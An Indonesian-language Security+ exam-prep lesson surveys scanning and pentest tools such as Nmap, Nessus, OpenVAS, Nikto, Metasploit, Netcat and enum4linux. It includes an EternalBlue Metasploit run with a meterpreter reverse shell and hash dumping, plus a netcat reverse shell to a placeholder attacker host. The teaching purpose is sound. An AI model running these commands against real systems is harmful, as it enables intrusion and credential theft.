0Pricing
Security+ Academy · Pelajaran

Alat Pemindaian Umum: Nessus, OpenVAS, Nmap

Dapatkan pengalaman langsung dengan alat berstandar industri untuk menemukan host, memindai port, dan mengidentifikasi kerentanan.

Alat Pemindaian Umum: Nessus, OpenVAS, Nmap adalah pelajaran Security+ Academy gratis di CoddyKit. Ini adalah pelajaran 2 dari 4. Kamu bisa membaca pelajaran lengkapnya di bawah secara gratis — lalu praktikkan langsung di browser dengan editor kode bawaan dan tutor AI 24/7. Ini adalah bagian dari jalur belajar Security+ Academy, dan progresmu tersinkronisasi di web dan aplikasi CoddyKit. Kursus Security+ Academy mencakup 4 pelajaran total.

Ekosistem Alat Pemindaian

Profesional Security menggunakan berbagai alat pemindaian untuk tujuan yang berbeda: menemukan host, memindai port, melakukan enumerasi layanan, mendeteksi sistem operasi, mengidentifikasi kerentanan, dan menguji aplikasi web. Security+ mengharapkan pemahaman tentang alat yang paling banyak digunakan dalam setiap kategori. Memahami fungsi setiap alat—serta hal yang tidak dapat dilakukannya—membantu Anda memilih alat yang tepat untuk Task tertentu dan menafsirkan Results dengan benar. Results dari beberapa alat yang saling melengkapi memberikan cakupan yang lebih lengkap daripada satu alat saja.

Nmap: Network Mapper

Nmap (Network Mapper) adalah alat sumber terbuka yang paling banyak digunakan untuk menemukan jaringan dan melakukan audit Security. Alat ini dapat menemukan host yang aktif, melakukan enumerasi port terbuka, mendeteksi layanan yang berjalan beserta versinya, dan mengidentifikasi sistem operasi. Nmap menggunakan berbagai teknik pemindaian, termasuk SYN scan (Default, cepat, dan relatif tersembunyi), TCP Connect (jabat tangan penuh, lebih berisik tetapi tidak memerlukan akses root), UDP scan, dan pemindaian versi. Nmap dilengkapi Nmap Scripting Engine (NSE), yang menyediakan ratusan skrip untuk mendeteksi kerentanan, melakukan brute-force, dan eksploitasi.

# Common Nmap scan types:
nmap -sS 192.168.1.0/24          # SYN scan (fast, stealthy)
nmap -sT 192.168.1.10            # TCP connect scan
nmap -sU -p 53,67,161 target     # UDP scan specific ports
nmap -sV 192.168.1.10            # version detection
nmap -O 192.168.1.10             # OS detection
nmap -A 192.168.1.10             # aggressive: -sV -O -sC --traceroute
nmap -p- 192.168.1.10            # scan all 65535 ports
nmap --script vuln 192.168.1.10  # run vulnerability scripts

Keluaran dan Interpretasi Nmap

Menafsirkan keluaran Nmap dengan benar adalah keterampilan penting. Setiap baris mewakili port dengan statusnya (terbuka: layanan sedang mendengarkan, tertutup: host merespons tetapi tidak ada layanan yang mendengarkan, difilter: tidak ada respons atau ICMP tidak dapat dijangkau, kemungkinan diblokir firewall), protokol, serta layanan/versi yang terdeteksi. Port terbuka menunjukkan potensi permukaan serangan. Port terbuka yang tidak terduga pada host dapat menunjukkan kompromi atau layanan yang tidak sah. Flag -oN, -oX, dan -oG menyimpan keluaran dalam format normal, XML, dan yang dapat diproses grep—menyimpan keluaran sangat penting untuk dokumentasi dan perbandingan antar pemindaian dari waktu ke waktu.

# Sample Nmap output:
# PORT     STATE SERVICE  VERSION
# 22/tcp   open  ssh      OpenSSH 8.2p1 Ubuntu
# 80/tcp   open  http     Apache 2.4.41
# 443/tcp  open  ssl/http Apache 2.4.41
# 8080/tcp open  http     Jetty 9.4.39
# 3306/tcp open  mysql    MySQL 8.0.26
# 3306 open to internet = HIGH RISK (should be internal only)

# Save output:
nmap -sV 192.168.1.0/24 -oN scan_results.txt -oX scan_results.xml

Nessus: Vulnerability Scanner untuk Perusahaan

Nessus (oleh Tenable) adalah Vulnerability Scanner komersial yang paling banyak digunakan. Alat ini menggunakan arsitektur plugin dengan lebih dari 100.000 plugin yang mencakup CVE, pemeriksaan konfigurasi, tolok ukur kepatuhan (CIS, DISA STIG), dan deteksi malware. Nessus melakukan credentialed scans dengan masuk ke sistem menggunakan Credentials yang diberikan untuk memeriksa versi perangkat lunak yang terpasang, kunci registri, dan berkas konfigurasi—menghasilkan Results yang jauh lebih akurat daripada penyelidikan jaringan tanpa Credentials. Nessus menghasilkan laporan terperinci dengan skor CVSS, Description kerentanan, dan rekomendasi Remediation. Versi gratis Nessus Essentials dapat memindai hingga 16 IPs.

# Nessus scan configuration key settings:
# Scan type: Advanced Scan (most control)
# Credentials: Windows (domain admin), SSH (root or sudo)
# Plugins: enable 'Safe Checks' to avoid crashing systems
# Schedule: define scan window (off-hours recommended)

# Nessus output rating:
# Critical (CVSS 9.0-10.0): remote code execution, critical data exposure
# High     (CVSS 7.0-8.9):  privilege escalation, severe data exposure
# Medium   (CVSS 4.0-6.9):  local privilege escalation, information disclosure
# Low      (CVSS 0.1-3.9):  minimal impact, hardening issues
# Info:    configuration data, no immediate risk

OpenVAS: Pemindaian Kerentanan Sumber Terbuka

OpenVAS (Open Vulnerability Assessment System) adalah Vulnerability Scanner gratis dan sumber terbuka yang dikelola oleh Greenbone Networks. OpenVAS merupakan fork yang didukung komunitas dari Nessus asli sebelum Nessus menjadi produk komersial. OpenVAS menggunakan NVT (Network Vulnerability Tests) yang sepadan dengan plugin Nessus. Greenbone Community Edition (GCE) menyediakan antarmuka manajemen berbasis web (Greenbone Security Assistant). OpenVAS populer di lingkungan yang biaya lisensinya menghalangi penggunaan alat komersial. Fiturnya lebih luas daripada Nmap namun tetap gratis, sehingga menjadi pilihan umum bagi organisasi kecil, lingkungan akademik, dan laboratorium Security.

# OpenVAS quick start:
# Install via Kali Linux or Docker:
gvm-setup    # initial setup (takes time to download feeds)
gvm-start    # start OpenVAS services

# Create a scan in the web UI (https://localhost:9392):
# 1. Create Target (host IPs, credentials)
# 2. Create Scan Config (Full and Fast, or Full Deep)
# 3. Create Task -> assign target + config
# 4. Start Task -> review Results report

# CLI scan:
openvas-cli --host=127.0.0.1 --user=admin --xml="<start_task>..."

Nikto: Vulnerability Scanner Server Web

Nikto adalah pemindai server web sumber terbuka yang memeriksa berkas berbahaya, versi perangkat lunak yang usang, masalah konfigurasi server, dan kerentanan web umum. Alat ini menguji lebih dari 6.700 masalah yang diketahui, termasuk metode HTTP yang tidak aman, header Security yang hilang, antarmuka admin yang terekspos, Credentials Default, dan kerentanan CGI umum. Nikto bersifat berisik dan tidak dirancang untuk bersembunyi—alat ini menghasilkan log dalam jumlah besar pada Target. Nikto melengkapi pemindai tingkat jaringan dengan pemeriksaan khusus web yang mungkin tidak dicakup secara mendalam oleh Nessus dan OpenVAS. Selalu gunakan Nikto hanya pada sistem yang Anda berwenang untuk mengujinya.

# Nikto web scan examples:
nikto -h 192.168.1.10                    # basic scan
nikto -h https://192.168.1.10            # HTTPS target
nikto -h 192.168.1.10 -p 8080,8443      # multiple ports
nikto -h 192.168.1.10 -o report.html -Format html  # save report

# Nikto checks include:
# - Missing X-Frame-Options, Content-Security-Policy headers
# - Apache/nginx version disclosure
# - /admin, /phpinfo.php, /.git/ exposed
# - Default test files (phpMyAdmin, WebDAV)

Metasploit Framework

Metasploit Framework adalah platform pengujian penetrasi yang paling banyak digunakan, yang menyediakan basis data exploit, payload, modul auxiliary, dan alat pascaeksploitasi. Peserta Security+ harus memahami apa itu Metasploit dan bagaimana perannya dalam pen testing, meskipun mereka belum pernah menggunakannya. Modul Metasploit meliputi: exploit (kode yang memanfaatkan kerentanan), payload (shellcode yang berjalan setelah eksploitasi berhasil, seperti Meterpreter), modul auxiliary (pemindaian, fuzzing, dan enumerasi tanpa eksploitasi), serta modul pascaeksploitasi (untuk eskalasi hak akses, pengambilan Credentials, dan perpindahan lateral setelah akses awal).

# Metasploit Framework basic workflow:
msfconsole                          # start Metasploit
search eternalblue                  # search for exploit
use exploit/windows/smb/ms17_010_eternalblue
info                               # show exploit details
set RHOSTS 192.168.1.10            # target IP
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.5              # attacker IP
run                                # execute exploit

# After shell:
meterpreter> sysinfo
meterpreter> getuid
meterpreter> hashdump              # dump NTLM hashes

Netcat: Pisau Swiss Army

Netcat (nc) adalah utilitas sederhana tetapi serbaguna yang membaca dan menulis data melalui koneksi jaringan menggunakan TCP atau UDP. Utilitas ini memiliki banyak kegunaan dalam pekerjaan Security: membuat shell terbalik dari Host yang telah disusupi, mentransfer berkas antarsegmen jaringan, melakukan pemindaian Port, membuat pendengar jaringan sederhana untuk pengujian, serta mengambil Banner untuk mengidentifikasi versi layanan. Kesederhanaan dan ketersediaannya di hampir setiap sistem Linux menjadikannya alat yang sering digunakan baik dalam administrasi yang sah maupun perangkat penyerang, sehingga penting juga untuk memahami alat ini dari perspektif deteksi.

# Netcat usage examples:
# Banner grabbing:
nc -v 192.168.1.10 22    # grab SSH banner
nc -v 192.168.1.10 80    # grab HTTP banner

# Port scan:
nc -zv 192.168.1.10 1-1024 2>&1 | grep succeeded

# Reverse shell (attacker listens, victim connects out):
# Attacker: nc -lvnp 4444
# Victim: nc attacker_ip 4444 -e /bin/bash

# File transfer:
# Receiver: nc -lvnp 9999 > received_file.txt
# Sender:   nc receiver_ip 9999 < file.txt

Recon-ng dan Alat OSINT

Recon-ng adalah kerangka kerja pengintaian Web yang dirancang untuk mengumpulkan OSINT (Intelijen Sumber Terbuka). Kerangka kerja ini menggunakan modul yang meminta data dari sumber publik — Shodan, Bing, HaveIBeenPwned, catatan DNS, LinkedIn, WHOIS, dan logs transparansi Certificate — untuk mengumpulkan informasi tentang Target sebelum Scanning aktif dimulai. Fase Reconnaissance dalam pengujian Penetration biasanya dimulai dengan OSINT untuk membangun gambaran tentang topologi jaringan Target, nama karyawan, format email, teknologi yang digunakan, dan aset yang terekspos secara publik. OSINT yang baik dapat mengungkap jalur serangan yang akan jauh lebih lama ditemukan hanya melalui Scanning aktif.

# OSINT tool chain for reconnaissance:
# 1. WHOIS: domain registration details
whois example.com

# 2. DNS enumeration:
dnsrecon -d example.com -t std
fiercer --domain example.com

# 3. Shodan: internet-facing device search
# shodan search 'org:"Target Corp" port:3389'

# 4. theHarvester: emails, subdomains, names
theharvester -d example.com -l 500 -b google,linkedin

# 5. Certificate transparency:
crt.sh/?q=%.example.com  (reveals subdomains via certs)

Enumerasi Jaringan dengan Enum4linux

Enum4linux melakukan enumerasi informasi dari Host Windows dan server Samba (SMB Linux) menggunakan sesi null dan MSRPC. Alat ini mengekstrak nama pengguna, keanggotaan grup, share, kebijakan kata sandi, dan informasi workgroup. Selama pengujian Penetration internal, enum4linux dapat dengan cepat mengungkap akun pengguna yang tersedia untuk penyebaran kata sandi serta struktur share dalam suatu lingkungan. Versi Windows modern secara bawaan membatasi akses sesi null, tetapi environments yang salah konfigurasinya sering mengekspos banyak informasi. Kemampuan serupa tersedia dalam Impacket melalui samrdump.py dan CrackMapExec untuk enumerasi terautentikasi.

# Enum4linux Windows enumeration:
enum4linux -a 192.168.1.10       # all enumeration
enum4linux -U 192.168.1.10       # users only
enum4linux -S 192.168.1.10       # shares only

# CrackMapExec (authenticated enumeration):
crackmapexec smb 192.168.1.0/24 -u admin -p Password1
crackmapexec smb 192.168.1.10 --users
crackmapexec smb 192.168.1.10 --shares

# Nmap SMB scripts:
nmap --script smb-enum-users 192.168.1.10
nmap --script smb-os-discovery 192.168.1.10

Memilih Alat yang Tepat untuk Tugasnya

Profesional Security menyesuaikan alat dengan tugasnya. Untuk menemukan Host dan melakukan pemindaian Port: Nmap. Untuk mengidentifikasi Vulnerability dalam skala besar: Nessus (komersial) atau OpenVAS (gratis). Untuk Vulnerability pada server Web: Nikto. Untuk serangan aplikasi Web: Burp Suite. Untuk Exploitation: Metasploit. Untuk Reconnaissance OSINT: Recon-ng, theHarvester, Shodan. Untuk menganalisis lalu lintas jaringan: Wireshark, tcpdump. Untuk serangan nirkabel: rangkaian Aircrack-ng. Ujian Security+ menguji pengetahuan konseptual tentang alat-alat ini — Anda harus mengetahui kegunaan masing-masing alat meskipun belum memiliki pengalaman langsung dengan semuanya.

Pemeriksaan Singkat

Uji pemahaman Anda tentang konsep CompTIA Security+ (SY0-701) dari pelajaran ini.

Ringkasan Pelajaran

Dalam pelajaran ini Anda mempelajari bahwa Nmap adalah dasar untuk menemukan Host, melakukan pemindaian Port, dan mendeteksi versi, dengan mesin skrip yang kaya untuk kemampuan tambahan; Nessus dan OpenVAS melakukan pemindaian Vulnerability menyeluruh terhadap CVE yang diketahui menggunakan akses dengan kredensial untuk akurasi terbaik; dan Metasploit menyediakan kerangka kerja eksploitasi bagi penguji Penetration untuk mengonfirmasi bahwa Vulnerability benar-benar dapat dieksploitasi serta menunjukkan dampak serangan yang nyata. Selanjutnya, kita akan membahas seluruh siklus pengujian Penetration, mulai dari Reconnaissance hingga Reporting.

Pertanyaan yang Sering Diajukan

Apakah pelajaran “Alat Pemindaian Umum: Nessus, OpenVAS, Nmap” gratis?

Ya — teks lengkap “Alat Pemindaian Umum: Nessus, OpenVAS, Nmap” gratis dibaca di sini di web. Untuk praktiknya secara interaktif (editor kode bawaan dan tutor AI 24/7) dan buka sisa kursus Security+ Academy, upgrade ke CoddyKit PRO. Kursus Security+ Academy mencakup 4 pelajaran total.

Apa yang akan aku pelajari di “Alat Pemindaian Umum: Nessus, OpenVAS, Nmap”?

Dapatkan pengalaman langsung dengan alat berstandar industri untuk menemukan host, memindai port, dan mengidentifikasi kerentanan. Kamu berlatih Security+ Academy dengan kode praktik yang langsung kamu jalankan di browser, dan tutor AI 24/7 menjawab pertanyaanmu saat kamu mengerjakan pelajaran ini.

Apakah aku perlu pengalaman untuk memulai Security+ Academy?

Tidak diperlukan pengalaman sebelumnya. Security+ Academy di CoddyKit dirancang untuk pemula hingga pelajar tingkat lanjut, jadi kamu bisa memulai di sini atau dari awal dan belajar sesuai kecepatan kamu sendiri. Ini adalah pelajaran 2 dari 4.

Berapa lama pelajaran “Alat Pemindaian Umum: Nessus, OpenVAS, Nmap” memakan waktu?

Sebagian besar pelajaran CoddyKit memakan waktu sekitar 5–10 menit. Setiap pelajaran ringkas dan interaktif, jadi kamu membuat kemajuan stabil dan melanjutkan dari tempat kamu tinggalkan di web dan aplikasi.

Bisakah aku menulis dan menjalankan kode dalam pelajaran Security+ Academy ini?

Ya. Setiap pelajaran Security+ Academy menyertakan editor kode bawaan, jadi kamu menulis dan menjalankan kode nyata langsung di browser dan mendapatkan umpan balik AI instan — tidak diperlukan penyiapan lokal.

Semua pelajaran dalam kursus ini

  1. Pemindaian Kerentanan vs Pengujian Penetrasi
  2. Alat Pemindaian Umum: Nessus, OpenVAS, Nmap
  3. Tahapan Pengujian Penetrasi: Dari Pengintaian hingga Pelaporan
  4. Penilaian CVSS dan Prioritas Kerentanan
← Kembali ke Security+ Academy